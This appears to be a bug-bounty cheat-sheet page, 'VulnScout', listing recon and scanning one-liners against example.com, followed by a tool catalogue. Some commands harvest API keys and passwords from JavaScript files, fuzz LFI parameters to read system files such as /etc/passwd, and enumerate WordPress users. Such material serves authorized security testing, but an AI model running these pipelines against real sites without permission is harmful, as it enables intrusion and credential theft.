Security Tools

VulnScout

Advanced Bug Hunting Toolkit & Reconnaissance Platform

Subdomain Enumeration

Subfinder Recursive

Discover subdomains using recursive enumeration

$ subfinder -d example.com -all -recursive -o subdomains.txt

Assetfinder

Find domains and subdomains quickly

$ assetfinder --subs-only example.com > assetfinder.txt

Certificate Transparency (crt.sh)

Find subdomains via certificate transparency logs

$ curl -s "https://crt.sh/?q=example.com&output=json" | jq -r '.[].name_value' | sed 's/\*\.//g' | sort -u > crtsh.txt

Merge & De-duplicate All Subdomains

Always combine outputs before probing

$ cat subdomains.txt assetfinder.txt crtsh.txt | sort -u > all_subdomains.txt

Live Subdomain Check

Filter alive subdomains with httpx

$ cat all_subdomains.txt | httpx -silent -o subdomains_alive.txt

URL Collection

Katana Crawling

Advanced crawling with multiple sources

$ katana -l subdomains_alive.txt -d 5 -ps -o allurls.txt

GAU + Wayback

Fetch URLs from multiple archives

$ cat subdomains_alive.txt | gau | urldedupe >> allurls.txt

Parameter Extraction

Extract URLs with parameters

$ cat allurls.txt | grep '=' | sort -u > urls_with_params.txt

Sensitive Data Discovery

Sensitive Files

Find exposed sensitive files

$ cat allurls.txt | grep -E '\.(bak|sql|zip|conf|env|key)$' > sensitive_findings.txt

S3 Bucket Finder

Discover S3 buckets

$ s3scanner scan -d example.com -o s3_buckets.txt

Git Repository Check

Detect exposed git repos

$ cat allurls.txt | httpx -path '/.git/' -mc 200 -o git_repos.txt

Information Disclosure Scanner

Checks for information disclosure vulnerabilities using a scanner

$ cat allurls.txt | grep -E "\.(xls|xml|xlsx|json|pdf|sql|doc|docx|pptx|txt|zip|tar\.gz|tgz|bak|7z|rar|log|cache|secret|db|backup|yml|gz|config|csv|yaml|md|md5|tar|xz|7zip|p12|pem|key|crt|csr|sh|pl|py|java|class|jar|war|ear|sqlitedb|sqlite3|dbf|db3|accdb|mdb|sqlcipher|gitignore|env|ini|conf|properties|plist|cfg)$" > sensitive_disclosure.txt

AWS S3 Bucket Finder

Searches for AWS S3 buckets associated with the target

$ s3scanner scan -d example.com -o s3_buckets_full.txt

API Key Finder

Searches for exposed API keys and tokens in JavaScript files

$ cat allurls.txt | grep -E "\.js$" | httpx -mc 200 -content-type | grep -E "application/javascript|text/javascript" | cut -d' ' -f1 | xargs -I{} curl -s {} | grep -E "(API_KEY|api_key|apikey|secret|token|password)" > api_keys.txt

XSS Testing

XSS Finding Pipeline

Comprehensive XSS hunting

$ cat allurls.txt | gf xss | Gxss | tee xss_findings.txt

Dalfox Scanner

Advanced XSS vulnerability scanner

$ cat urls_with_params.txt | dalfox pipe -o xss_dalfox.txt

Stored XSS Check

Find stored XSS in forms

$ nuclei -l allurls.txt -t xss -o xss_nuclei.txt

DOM XSS Detection

Detects potential DOM-based XSS vulnerabilities

$ cat allurls.txt | grep -E "\.js$" > js_files.txt && cat js_files.txt | Gxss -c 100 | sort -u | dalfox pipe -o dom_xss_results.txt

LFI Testing

LFI Parameter Hunt

Find LFI vulnerable parameters

$ cat allurls.txt | gf lfi | uro > lfi_findings.txt

FFUF LFI Fuzzing

Fuzz for LFI vulnerabilities

$ ffuf -l lfi_findings.txt -w payloads/lfi.txt -mr "root:" -o lfi_results.json

Path Traversal Check

Test path traversal payloads

$ cat lfi_findings.txt | head -1 | xargs -I{} curl -s '{}' > lfi_test.txt

CORS Testing

Basic CORS Check

Check CORS policy of a website

$ cat subdomains_alive.txt | head -1 | xargs -I{} curl -I -H "Origin: http://example.com" {} > cors_check.txt

CORScanner

Fast CORS misconfiguration scanner

$ python3 CORScanner.py -u subdomains_alive.txt -d -t 10 -o cors_results.txt

CORS Nuclei Scan

Scan for CORS misconfigurations

$ cat subdomains_alive.txt | httpx -silent | nuclei -t cors -o cors_findings.txt

WordPress Scanning

WPScan Aggressive

Comprehensive WordPress vulnerability scan

$ cat subdomains_alive.txt | grep -i "wordpress\|wp-" | head -1 | xargs -I{} wpscan --url {} --disable-tls-checks -e at,ap,u -o wordpress_scan.json

WordPress Theme Detection

Identify WordPress themes and vulnerabilities

$ wpscan --url https://example.com --no-banner -e t -o theme_results.json

WordPress User Enumeration

Enumerate WordPress users and plugins

$ wpscan --url https://example.com -e u,ap -o wordpress_full.json

All Security Tools

Download & Install Script: These tools are included in the install-all-tools.sh script

Download Install Script Download Update Script

Go-based Tools

Subfinder
Subfinder
Fast passive subdomain enumeration tool
GitHub | Docs
HTTPx
HTTPx
Fast HTTP prober with multiple features
GitHub | Docs
Katana
Katana
Next-generation web crawler and endpoint finder
GitHub | Docs
Nuclei
Nuclei
Fast customizable vulnerability scanner
GitHub | Docs
Assetfinder
Assetfinder
Find all domains and subdomains owned by a given domain
GitHub
Waybackurls
Waybackurls
Fetch all URLs from Wayback Machine for a domain
GitHub
GF
GF
A wrapper around grep for patterns
GitHub
Amass
Amass
In-depth DNS enumeration and mapping
GitHub

Python-based Tools

LinkFinder
LinkFinder
Extract endpoints and URLs from JavaScript files
GitHub
Commix
Commix
Automated injection testing framework
GitHub
Ghauri
Ghauri
Advanced SQL injection detection and exploitation
GitHub
ParamSpider
ParamSpider
Parameter discovery tool for security testing
GitHub
WAFW00f
WAFW00f
Identify and fingerprint WAFs
GitHub
JWT-Tool
JWT-Tool
JWT token testing and exploitation
GitHub
Arjun
Arjun
HTTP parameter discovery tool
GitHub

Advanced Tools

S3Scanner
S3Scanner
Discover and exploit S3 buckets
GitHub
SSTImap
SSTImap
Server-Side Template Injection scanner
GitHub
SSRFmap
SSRFmap
SSRF vulnerability testing and exploitation
GitHub
LFISuite
LFISuite
Local File Inclusion exploitation suite
GitHub
X8
X8
Hidden parameters and endpoints discovery
GitHub
Copied to clipboard!